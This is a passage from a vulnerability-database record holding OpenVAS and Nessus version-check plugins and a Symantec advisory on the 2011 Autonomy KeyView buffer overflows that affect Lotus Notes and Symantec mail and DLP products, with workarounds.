if(version_is_less_equal(version:version[1], 
test_version:\"8.5.2.2\")){\n report = report_fixed_ver(installed_version:version[1], vulnerable_range:\"Less than or equal to 8.5.2.2\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-04T14:20:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1215", "CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "description": "This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.", "modified": "2017-08-30T00:00:00", "published": "2011-06-07T00:00:00", "id": "OPENVAS:801945", "href": "http://plugins.openvas.org/nasl.php?oid=801945", "type": "openvas", "title": "IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_lotus_notes_mult_bof_vuln_win.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code in the\n context of the user running the application.\n Impact Level: Application\";\ntag_affected = \"IBM Lotus Notes Version 8.5.2 FP2 and prior on windows\";\ntag_insight = \"The flaws are due to:\n - An error within 'xlssr.dll' when parsing a Binary File Format (BIFF)\n record in an Excel spreadsheet.\n - An integer underflow error within 'lzhsr.dll' when parsing header\n information in a LZH archive file.\n - A boundary error within 'rtfsr.dll' when parsing hyperlink information\n in a Rich Text Format (RTF) document.\n - A boundary error within 'mw8sr.dll' when parsing hyperlink information\n in a Microsoft Office Document (DOC) file.\n - A boundary error within 'assr.dll' when parsing tag information in an\n Applix Spreadsheet.\n - An unspecified error within 'kpprzrdr.dll' when parsing Lotus Notes .prz\n file format.\n - An unspecified error within 'kvarcve.dll' when parsing Lotus Notes .zip\n file format.\";\ntag_solution = \"Upgrade to IBM Lotus Notes 8.5.2 FP3\n For updates refer to http://www.ibm.com/software/lotus/products/notes/\";\ntag_summary = \"This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(801945);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-07 13:29:28 +0200 (Tue, 07 Jun 2011)\");\n script_cve_id(\"CVE-2011-1213\", \"CVE-2011-1214\", \"CVE-2011-1215\", \"CVE-2011-1216\",\n 
\"CVE-2011-1217\", \"CVE-2011-1218\", \"CVE-2011-1512\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/44624\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/67621\");\n script_xref(name : \"URL\" , value : \"https://www-304.ibm.com/support/docview.wss?uid=swg21500034\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH,\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_require_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get for IBM Lotus Notes Version\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\n## Match main version and ignore the build version\nversion = eregmatch(pattern:\"(([0-9]+\\.[0-9]+\\.[0-9]+).?([0-9]+)?)\", string: lotusVer);\nif(version[1] != NULL)\n{\n ## Check for IBM Lotus Notes Version < 8.5.2 FP3\n if(version_is_less_equal(version:version[1], test_version:\"8.5.2.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-06-16T03:03:50", "description": "The file attachment viewer component included with the instance of\nLotus Notes installed on the remote Windows host is 
reportedly\naffected by several buffer overflow vulnerabilities that can be\ntriggered when handling attachments of various types.\n\nBy sending a specially crafted attachment to users of the affected\napplication and getting them to double-click and view the attachment,\nan attacker may be able to execute arbitrary code subject to the\nprivileges under which the affected application runs.", "edition": 21, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2011-05-31T00:00:00", "title": "IBM Lotus Notes Attachment Handling Multiple Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1215", "CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-0548", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "modified": "2011-05-31T00:00:00", "cpe": ["cpe:/a:ibm:lotus_notes"], "id": "NOTES_KEYVIEW_OVERFLOWS2.NASL", "href": "https://www.tenable.com/plugins/nessus/54922", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(54922);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\n \"CVE-2011-0548\",\n \"CVE-2011-1213\",\n \"CVE-2011-1214\",\n \"CVE-2011-1215\",\n \"CVE-2011-1216\",\n \"CVE-2011-1217\",\n \"CVE-2011-1218\",\n \"CVE-2011-1512\"\n );\n script_bugtraq_id(\n 47962,\n 48013,\n 48016,\n 48017,\n 48018,\n 48019,\n 48020,\n 48021\n );\n script_xref(name:\"CERT\", value:\"126159\");\n script_xref(name:\"EDB-ID\", value:\"17448\");\n script_xref(name:\"Secunia\", value:\"44624\");\n\n script_name(english:\"IBM Lotus Notes Attachment Handling Multiple Buffer Overflows\");\n script_summary(english:\"Checks file version of kvgraph.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple buffer overflow vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The file attachment viewer component included with the instance of\nLotus Notes installed on the remote Windows host is reportedly\naffected by several buffer overflow vulnerabilities that can be\ntriggered when handling attachments of various types.\n\nBy sending a specially crafted attachment to users of the affected\napplication and getting them to double-click and view the attachment,\nan attacker may be able to execute arbitrary code subject to the\nprivileges under which the affected application runs.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518139\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518137\");\n # https://www.secureauth.com/labs/advisories/LotusNotes-XLS-viewer-heap-overflow\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c85aef3a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/178\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/182\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/518120/100/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21500034\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either Install Interim Fix 1 for Notes 8.5.2 Fix Pack 2 / 8.5.2 Fix\nPack 3 or upgrade to 8.5.3. 
Alternatively, disable attachment viewers.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-0548\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:lotus_notes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\",\"lotus_notes_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\",\"SMB/Lotus_Notes/Installed\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nkb_base = \"SMB/Lotus_Notes/\";\n\nversion = get_kb_item_or_exit(kb_base + 'Version');\npath = get_kb_item_or_exit(kb_base + 'Path');\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\n# Retrieve the appropriate share.\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n# Get a list of user data dirs on the system\nregistry_init();\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nif (empty_or_null(hku))\n{\n RegCloseKey(handle:hku);\n close_registry();\n audit(AUDIT_REG_FAIL);\n}\nkey_h = RegOpenKey(handle:hku, mode:MAXIMUM_ALLOWED);\nif (!empty_or_null(key_h))\n{\n reginfo = RegQueryInfoKey(handle:key_h);\n}\n\nif (!empty_or_null(reginfo))\n{\n datadirs = [];\n registry_init();\n for (i = 0; i < reginfo[1]; i++)\n {\n subkey = RegEnumKey(handle:key_h, index:i);\n key = subkey + \"\\Software\\IBM\\Notes\\Installer\\DATADIR\";\n datadir = get_registry_value(handle:hku, item:key);\n if (empty_or_null(datadir))\n {\n key = subkey + \"\\Software\\Lotus\\Notes\\Installer\\DATADIR\";\n datadir = get_registry_value(handle:hku, item:key);\n }\n if (!empty_or_null(datadir) && subkey =~ '^S-1-5-21-[0-9\\\\-]+$')\n {\n datadirs[max_index(datadirs)] = datadir;\n }\n }\n RegCloseKey(handle:key_h);\n RegCloseKey(handle:hku);\n close_registry();\n}\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n# Split the software's location into components.\nbase = preg_replace(string:path, pattern:\"^(.+)\\\\$\", replace:\"\\1\");\nshare = preg_replace(string:base, pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\");\npath = preg_replace(string:base, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\");\nfound = FALSE;\n\n# Connect to the share software is installed on.\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n}\nif (!empty_or_null(datadirs))\n{\n foreach datadir (datadirs)\n {\n file = preg_replace(string:datadir, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\") + \"\\KeyView.ini\";\n file_h = CreateFile(\n file:file,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!empty_or_null(file_h))\n {\n found = TRUE;\n }\n }\n file = preg_replace(string:base, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\") + \"\\KeyView.ini\";\n file_h = CreateFile(\n file:file,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!empty_or_null(file_h))\n {\n found = TRUE;\n }\n CloseFile(handle:file_h);\n\n if (!found)\n {\n NetUseDel();\n audit(AUDIT_INST_VER_NOT_VULN, \"IBM Notes\");\n }\n}\n\n# Try and read one of the vulnerable files.\nfile_h = CreateFile(\n file:path + \"\\xlssr.dll\",\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n);\nif (isnull(file_h))\n{\n NetUseDel();\n audit(AUDIT_INST_VER_NOT_VULN, \"IBM Notes\");\n}\n\nversion = GetFileVersion(handle:file_h);\nCloseFile(handle:file_h);\nNetUseDel();\nif (isnull(version)) exit(1, \"Failed to extract the file version from '\" + base + \"\\xlssr.dll'.\");\n\n# Check if the DLL file is vulnerable.\nfix = 
\"8.5.23.11191\";\nver = join(version, sep:\".\");\nif (ver_compare(ver:ver, fix:fix) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, \"IBM Notes\");\n\n# Report our findings.\nreport =\n '\\n File : ' + base + \"\\xlssr.dll\" +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:445, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:10:36", "description": "The file attachment filter component included with the instance of\nSymantec Mail Security installed on the remote Windows host is\nreportedly affected by multiple buffer overflow vulnerabilities that can\nbe triggered when handling attachments of various types. \n\nBy sending an email with a specially crafted attachment through a\nvulnerable server, an attacker could execute arbitrary code subject to\nthe privileges under which the affected daemon runs.", "edition": 25, "published": "2011-10-28T00:00:00", "title": "Symantec Mail Security Autonomy Verity Keyview Filter Vulnerabilities (SYM11-013)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0337", "CVE-2011-1215", "CVE-2011-1214", "CVE-2011-0338", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-0339", "CVE-2011-1213"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:symantec:mail_security"], "id": "SYMANTEC_SYM_11-013.NASL", "href": "https://www.tenable.com/plugins/nessus/56666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56666);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2011-0337\",\n \"CVE-2011-0338\",\n \"CVE-2011-0339\",\n \"CVE-2011-1213\",\n \"CVE-2011-1214\",\n \"CVE-2011-1215\",\n \"CVE-2011-1216\",\n \"CVE-2011-1218\",\n \"CVE-2011-1512\"\n );\n script_bugtraq_id(\n 48016,\n 48017,\n 48018,\n 48019,\n 48020,\n 48021,\n 49898,\n 49899,\n 49900\n 
);\n\n script_name(english:\"Symantec Mail Security Autonomy Verity Keyview Filter Vulnerabilities (SYM11-013)\");\n script_summary(english:\"Checks version of Symantec Mail Security\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a mail security application installed that\nis affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The file attachment filter component included with the instance of\nSymantec Mail Security installed on the remote Windows host is\nreportedly affected by multiple buffer overflow vulnerabilities that can\nbe triggered when handling attachments of various types. \n\nBy sending an email with a specially crafted attachment through a\nvulnerable server, an attacker could execute arbitrary code subject to\nthe privileges under which the affected daemon runs.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?36cf5cc9\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Symantec Mail Security for Domino, upgrade to version 7.5.12 /\n8.0.9. 
\n\nIf using Symantec Mail Security for Microsoft Exchange, upgrade to\nversion 6.0.13 / 6.5.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/28\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:mail_security\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sms_for_domino.nasl\", \"sms_for_msexchange.nasl\");\n script_require_keys(\"Symantec_Mail_Security/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Symantec_Mail_Security/Installed\");\n\ndirs = make_list(\"Domino\", \"Exchange\");\n\n# Ensure that the affected software is installed.\nbackend = NULL;\nforeach type (dirs)\n{\n if (get_kb_item(\"SMB/SMS_\" + type + \"/Installed\"))\n {\n backend = type;\n break;\n }\n}\nif (isnull(backend) || (backend != 'Exchange' && backend != 'Domino')) exit(0, \"Neither Symantec Mail Security for Domino nor Exchange is installed on the remote 
host.\");\n\npath = get_kb_item_or_exit(\"SMB/SMS_\" + type + \"/Path\");\nversion = get_kb_item_or_exit(\"SMB/SMS_\" + type + \"/Version\");\n\nif (\n (\n backend == 'Exchange' &&\n (\n (version =~ '^6\\\\.0\\\\.' && ver_compare(ver:version, fix:'6.0.13', strict:FALSE) == -1) ||\n (version =~ '^6\\\\.[1-5]\\\\.' && ver_compare(ver:version, fix:'6.5.6', strict:FALSE) == -1)\n )\n ) ||\n (\n backend == 'Domino' &&\n (\n (version =~ '^7\\\\.5\\\\.' && ver_compare(ver:version, fix:'7.5.12', strict:FALSE) == -1) ||\n (version =~ '^8\\\\.' && ver_compare(ver:version, fix:'8.0.9', strict:FALSE) == -1)\n )\n )\n)\n{\n # Report our findings.\n if (report_verbosity > 0)\n {\n if (backend == 'Exchange') fix = '6.0.13 / 6.5.6';\n else fix = '7.5.12 / 8.0.9';\n report =\n '\\n Product : Symantec Mail Security for ' + backend +\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse exit(0, 'The Symantec Mail Security for '+backend+' '+version+' install on the host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:42:29", "bulletinFamily": "software", "cvelist": ["CVE-2011-0337", "CVE-2011-0338", "CVE-2011-0339", "CVE-2011-1213", "CVE-2011-1214", "CVE-2011-1215", "CVE-2011-1216", "CVE-2011-1218", "CVE-2011-1512"], "description": "### SUMMARY\n\n \n\nMultiple sources have identified several security issues in Autonomy's Verity Keyview Content Filter libraries. 
Symantec has updated the Keyview modules being shipped with Symantec products to address these issues.\n\n### AFFECTED PRODUCTS\n\n \n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**Build**\n\n| \n\n**Solution(s)** \n \n---|---|---|--- \n \nSymantec Mail Security for Microsoft Exchange (SMSMSE)\n\n| \n\n6.x\n\n| \n\nAll\n\n| \n\n SMSMSE 6.5.6 or SMSMSE 6.0.13 (see mitigation workarounds below to disable content filtering as an interim) \n \nSymantec Mail Security for Domino (SMSDOM)\n\n| \n\n8.x\n\n| \n\nAll\n\n| \n\nSMSDOM 8.0.9 (see mitigation workarounds below to disable content filtering as an interim) \n \nSymantec Mail Security for Domino\n\n| \n\n7.5.x\n\n| \n\nAll\n\n| \n\nSMSDOM 7.5.12 (see mitigation workarounds below to disable content filtering as an interim) \n \nSymantec Brightmail and Messaging Gateway (SBG/SMG)\n\n| \n\n9.5 and earlier\n\n| \n\nAll\n\n \n\n| \n\nSymantec Messaging Gateway 9.5.1 \n \nSymantec Data Loss Prevention(DLP) Enforce/Detection Servers for Windows\n\n| \n\n10.x and earlier\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Windows \n \nSymantec Data Loss Prevention Enforce/Detection Servers for Linux\n\n| \n\n10.x and earlier\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Linux \n \nSymantec Data Loss Prevention Endpoint Agents\n\n| \n\n10.x and earlier\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 Agent \n \nSymantec Data Loss Prevention Enforce/Detection Servers for Windows\n\n| \n\n11.x\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Windows \n \nSymantec Data Loss Prevention Enforce/Detection Servers for Linux\n\n| \n\n11.x\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Linux \n \nSymantec Data Loss Prevention Endpoint Agents\n\n| \n\n11.x\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 Agent \n \n \n\nNOTE: Disabling content filtering as described in the mitigation section below does NOT interfere with the primary functionality of Symantec's products, e.g., anti-virus or anti-spam.\n\n### ISSUES\n\n \n\nMedium to High (based on the CVSS2 
scoring below)\n\nHigh \nCVSS V2 9.33 (for SMSME and SMSDOM, running the Autonomy Verity Keyview Filter in-process or out-of-process with application-level privileges.)\n\nImpact: 10 Exploitability 8.588\n\nCVSS V2 Vector AV: N/AC: M/Au: N/C:C/I:C/A:C\n\nMedium\n\nCVSS V2 4.3 (for SBG/SMG and DLP, running the Autonomy Verity Keyview Filter out-of-process with least privileges.)\n\nImpact: 2.862 Exploitability: 8.588\n\nCVSS V2 Vector AV:N/AC:M/Au:N/C:N/I:N/A:P\n\n**CVE ID Assigned**\n\n| \n\n**File Type / KV component**\n\n| \n\n**Credited To**\n\n| \n\n**BID** \n \n---|---|---|--- \n \nCVE-2011-1512\n\n| \n\nExcel Doc/xsslr\n\n| \n\n[CoreLabs Research](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>)\n\n| \n\n[BID 48017](<http://www.securityfocus.com/bid/48017>) \n \nCVE-2011-1213\n\n| \n\nExcel Doc/xsslr\n\n| \n\n[CoreLabs Research](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>)\n\n| \n\n[BID 48018](<http://www.securityfocus.com/bid/48018/info>) \n \nCVE-2011-1214\n\n| \n\nLZH Archive/lzhsr\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48019](<http://www.securityfocus.com/bid/48019>) \n \nCVE-2011-1215\n\n| \n\nRTF attach/rtfsr\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48020](<http://www.securityfocus.com/bid/48020/info>) \n \nCVE-2011-1216\n\n| \n\nApplix Spreadsheet/assr\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48021](<http://www.securityfocus.com/bid/48021>) \n \nCVE-2011-1218\n\n| \n\nZip File Viewer/kvarcve\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48016](<http://www.securityfocus.com/bid/48016/info>) \n \nCVE-2011-0337\n\n| \n\nIchitaro Speed Reader doc/ jtdsr\n\n| \n\n[Secunia 
Research](<http://secunia.com/research>)\n\n| \n\n[BID 49898](<http://www.securityfocus.com/vulnerabilities>) \n \nCVE-2011-0338 \n\n| \n\nIchitaro Speed Reader doc/jtdsr\n\n| \n\n[Secunia Research](<http://secunia.com/research>)\n\n| \n\n[BID 49899](<http://www.securityfocus.com/vulnerabilities>) \n \nCVE-2011-0339\n\n| \n\nIchitaro Speed Reader doc/jtdsr\n\n| \n\n[Secunia Research](<http://secunia.com/research>)\n\n| \n\n[BID 49900](<http://www.securityfocus.com/vulnerabilities>) \n \n \n\n| \n\nMultiple File Types\n\n| \n\n[CERT.org](<http://www.kb.cert.org/vuls/id/126159>)\n\n| \n\n \n \n### MITIGATION\n\n \n\n**Details** \nSymantec was notified of multiple security issues, including possible denial of service process crashes and potential code execution vulnerabilities, identified in several of the file parsing libraries in the Autonomy Verity Keyview Filter shipped with the Symantec products identified above. These vulnerabilities can potentially be targeted during the content filtering process run against maliciously formatted incoming files.\n\n Attempted exploitation results, depending on the product involved in the processing, range from no impact to a crash of the child process with negligible impact, an application crash or, in specific instances, potential elevated privilege application compromise.\n\n \n\n**Symantec Response** \nSymantec product engineers worked closely with Autonomy to obtain and provide updates to address all issues.\n\nSymantec Mail Security for Microsoft Exchange runs the Verity Filter as part of the application process. A successful exploitation attempt could potentially result in a denial of service application crash or possibly a privilege compromise in the context of the application. \n\nSymantec Mail Security for Domino runs the Verity Filter out-of-process by default, preventing attack attempts from crashing the application. 
However, the process runs in the context of the application which could potentially allow a possible privileged application compromise from a successful exploit attempt. \n\nCustomers running Symantec Mail Security for Microsoft Exchange or Symantec Mail Security for Domino should update to the non-vulnerable versions identified above or disable content filtering by following the mitigation workarounds described below until updates can be obtained and deployed.\n\nIn the Symantec BrightMail/Messaging Gateway and Symantec Data Loss Prevention products, the Autonomy Verity KeyView content filtering process has been separated from the Symantec applications (out-of-process) and runs with least privilege. This out-of-process method specifically addresses these types of security concerns.\n\nAny attempt to exploit these issues results in process termination of the offending thread and an error message generated to and handled by the specific application(s). However, non-vulnerable versions of the Verity Filter have been updated and made available to customers. 
Customers may still disable content filtering through the temporary mitigation workarounds described below until updates can be obtained and deployed.\n\nSymantec knows of no exploitation of or adverse customer impact from these issues.\n\n \n\n**Update Information**\n\nUpdates will be available through customers' normal support/download locations.\n\nSMS for Domino and Microsoft Exchange updates will be available through the [Platinum Support Web Site](<https://www-secure.symantec.com/platinum/login.html>) for Platinum customers or through the [FileConnect](<https://fileconnect.symantec.com/licenselogin.jsp>) Electronic Software Distribution web site.\n\nSymantec DLP updates will be available for download through [secure file exchange](<https://exftpp.symantec.com/>).\n\n \n\n**Workaround/Mitigations**\n\n**Temporary Workaround to disable content filtering in Symantec Mail Security for Microsoft Exchange** \nInstallations of SMS for Microsoft Exchange that _do not_ utilize the Content Filtering capabilities of the product _are not_ susceptible. SMS for Microsoft Exchange would be susceptible only if the attachment content scanning option is enabled. \n \nAs an interim workaround, administrators may fully disable content filtering rules that contain parameters specifying scanning of attachment content. The rules do not need to be deleted, only disabled until the updated release is installed.\n\n * To disable the content filtering rules for SMS for Microsoft Exchange:\n * Select the \"Policies\" tab and then choose \"Content Filtering\" to display the list of currently enabled rules\n * Ensure that all rules using attachment content are \"disabled\"\n * Or, instead of disabling content filtering altogether, the administrator can rename only the affected readers until updates can be installed:\n * Go to the Verity bin folder of the product installation, e.g. SMSMSE -> Verity -> bin\n * Locate the affected binary, e.g. lzhsr.dll\n * Rename the binary, e.g. 
